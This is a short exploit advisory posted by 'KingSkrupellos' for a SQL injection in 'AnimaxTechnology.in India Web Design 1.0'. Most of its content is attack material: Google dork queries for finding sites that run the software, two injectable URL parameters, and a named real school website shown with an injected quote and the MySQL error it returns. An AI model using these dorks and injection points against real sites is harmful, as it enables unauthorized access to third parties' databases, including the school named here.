AnimaxTechnology.in India Web Design version 1.0 suffers from a remote SQL injection vulnerability.
851a6bde508f1cd0402ffc9e23ded7ab##############################################################
# Exploit Title : AnimaxTechnology.in India Web Design 1.0 SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Date : 30/12/2018
# Vendor Homepage : animaxtechnology.in
# Tested On : Windows and Linux
# Exploit Risk : Medium
# Version Information : Apache 2.4.33 - OpenSSL 1.0.2o
# CWE : CWE-89 [ Improper Neutralization
of Special Elements used in an SQL Command ('SQL Injection') ]
# CXSecurity : cxsecurity.com/ascii/WLB-2018050298
##############################################################
Powered by AnimaxTechnology.in India SQL Injection Vulnerability
##############################################################
# Google Dork : intext:''Powered by Animaxtechnology.in''
# Google Dork : intext:''A(c) 2018 Animax Technology''
# Exploit : /news&events.php?id=[SQL Injection]
# Exploit : /aboutus.php?id=[SQL Injection]
##############################################################
# Example Site => abhinavpublicschoolrohini.com/aboutus.php?id=1%27
[ Proof of Concept for SQL Injection ] => archive.is/ONpCK
# SQL/DB Error : select * from tbl_aboutus where id='1''
You have an error in your SQL syntax; check the manual that corresponds
to your MySQL server version for the right syntax to use near ''1''' at
line 1'
##############################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
##############################################################